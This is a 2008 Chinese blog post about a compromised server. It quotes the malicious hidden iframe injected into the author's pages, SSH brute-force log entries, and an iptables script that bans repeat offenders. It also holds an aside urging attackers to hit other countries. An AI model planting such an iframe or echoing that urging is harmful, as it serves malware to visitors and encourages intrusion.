如何防止服务器被暴力破解密码？

askie — Sat, 30 Aug 2008 06:24:03 +0000

今天访问自己的一个网站，突然发现第一打开的时候页面上出现了一个黑色的图框，很小的那种，而且网页的css文件也没有加载，刷新后才会加载。于是我查看了网页源代码，这一看吓我一跳，很不幸的事情出现了，我的网站被挂马了，网页开头出现了如下代码：

   1: <iframe src=http://520zuixin.com/cn5.htm width=50 height=0>iframe>

马上登录服务器查看该网站代码，没找到异常，这是一件很奇怪的事情。代码是如何被插入到网页开头呢？难道在apache做了手脚？这个问题还没有查清楚，先放下这个问题。去查看服务器的安装记录。

当打开/var/logs/secure文件时，发现了很多利用ssh来暴力破解登录的记录，如下

Aug 29 16:27:23 fgb sshd[31098]: Failed password for root from 189.205.132.145 port 49920 ssh2
Aug 29 16:27:28 fgb sshd[31100]: Failed password for root from 189.205.132.145 port 55661 ssh2
Aug 29 16:27:33 fgb sshd[31103]: Failed password for root from 189.205.132.145 port 33579 ssh2
Aug 29 16:27:37 fgb sshd[31106]: Failed password for root from 189.205.132.145 port 39344 ssh2
Aug 29 16:27:42 fgb sshd[31115]: Failed password for root from 189.205.132.145 port 45117 ssh2
Aug 29 16:27:46 fgb sshd[31124]: Failed password for root from 189.205.132.145 port 50881 ssh2
Aug 29 16:27:52 fgb sshd[31126]: Failed password for root from 189.205.132.145 port 56359 ssh2
Aug 29 16:27:57 fgb sshd[31128]: Failed password for root from 189.205.132.145 port 35882 ssh2
Aug 29 16:28:02 fgb sshd[31130]: Failed password for root from 189.205.132.145 port 41888 ssh2
Aug 29 16:28:08 fgb sshd[31132]: Failed password for root from 189.205.132.145 port 47882 ssh2
Aug 29 16:28:12 fgb sshd[31134]: Failed password for root from 189.205.132.145 port 53121 ssh2
Aug 29 16:28:17 fgb sshd[31136]: Failed password for root from 189.205.132.145 port 59014 ssh2
Aug 29 16:28:21 fgb sshd[31139]: Failed password for root from 189.205.132.145 port 36742 ssh2

Aug 29 17:24:13 fgb sshd[32749]: Did not receive identification string from 220.231.81.140
Aug 29 17:28:50 fgb sshd[432]: Illegal user admin from 220.231.81.140
Aug 29 17:28:57 fgb sshd[450]: Failed password for root from 220.231.81.140 port 59843 ssh2
Aug 29 17:29:04 fgb sshd[452]: Illegal user stud from 220.231.81.140
Aug 29 17:29:11 fgb sshd[454]: Illegal user trash from 220.231.81.140
Aug 29 17:29:17 fgb sshd[457]: Illegal user gt05 from 220.231.81.140
Aug 29 17:29:22 fgb sshd[463]: Illegal user william from 220.231.81.140
Aug 29 17:29:26 fgb sshd[465]: Illegal user stephanie from 220.231.81.140
Aug 29 17:29:37 fgb sshd[468]: Failed password for root from 220.231.81.140 port 60795 ssh2
Aug 29 17:29:48 fgb sshd[471]: Failed password for root from 220.231.81.140 port 61017 ssh2
Aug 29 18:16:24 fgb sshd[1638]: warning: can't get client address: Connection reset by peer
Aug 29 18:16:24 fgb sshd[1638]: Could not write ident string to 219.142.141.194
Aug 29 18:16:29 fgb sshd[1639]: Accepted password for root from 219.142.141.194 port 30436 ssh2
Aug 29 18:16:37 fgb sshd[2650]: Received signal 15; terminating.
Aug 29 18:19:07 fgb sshd[2643]: Server listening on 0.0.0.0 port 22.
Aug 29 18:19:31 fgb sshd[2712]: Accepted password for root from 219.142.141.194 port 30477 ssh2

类似这样子的记录很多，看来有很多垃圾的人在破解我的服务器密码！现在垃圾和无聊的家伙还真多啊！我都懒的骂你们了！有本事去搞美国、去搞日本、去搞法国，在国内捣乱算什么东西！

骂归骂，但是还是要想办法制止密码被破解，后来在网站找到了一段代码，这段代码如下：

#!/bin/sh
SCANIP=`grep "Failed" /var/log/secure | awk '{print $(NF-3)}' |sort|uniq -c|awk '{print $1"="$2;}'`
for i in $SCANIP
do
NUMBER=`echo $i|awk -F= '{print $1}'`
SCANIP=`echo $i|awk -F= '{print $2}'`
echo "$NUMBER($SCANIP)"
if [ $NUMBER -gt 10 ] && [ -z "`iptables -vnL INPUT|grep $SCANIP`" ]
then
/sbin/iptables -I INPUT -s $SCANIP -m state --state NEW,RELATED,ESTABLISHED -j DROP
echo "`date` $SCANIP($NUMBER)" >> /var/log/scanip.log
fi
done

这段代码作用是：扫描secure安全日志文件，发现超过10次非法链接的ip，将其列入iptable防火墙禁止列表，并保存在记录文件中。将这段代码进行定时执行，就可以防止暴力破解的问题。经过这段代码首次扫描后，得到了如下的非法ip记录，这些ip已经被ban了！看这个结果就知道了有个垃圾ip居然非法扫描了我5000多次！

六  8月 30 13:50:55 CST 2008 123.30.0.68(52)
六  8月 30 13:50:55 CST 2008 189.205.132.145(324)
六  8月 30 13:50:54 CST 2008 201.6.150.22(41)
六  8月 30 13:50:54 CST 2008 202.102.144.8(13)
六  8月 30 13:50:55 CST 2008 219.238.183.30(162)
六  8月 30 13:50:54 CST 2008 222.174.167.162(5058)
六  8月 30 13:50:54 CST 2008 61.139.209.141(40)

关于被挂的那段代码怎么插入到我的网站，我继续研究一下，有了结果会记录在这里的！

记录与PHP的PK经历 » 木马

今日到南京上网，发现偶尔打开的网页出现如下代码

如何防止服务器被暴力破解密码？

Related items